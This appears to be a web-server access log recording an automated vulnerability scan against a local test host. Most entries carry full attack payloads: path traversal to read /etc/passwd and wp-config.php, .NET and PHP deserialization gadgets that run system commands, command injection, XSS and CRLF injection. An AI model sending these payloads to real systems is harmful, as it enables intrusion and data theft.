Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.197","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /responsiveUI/webmail/folder.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login 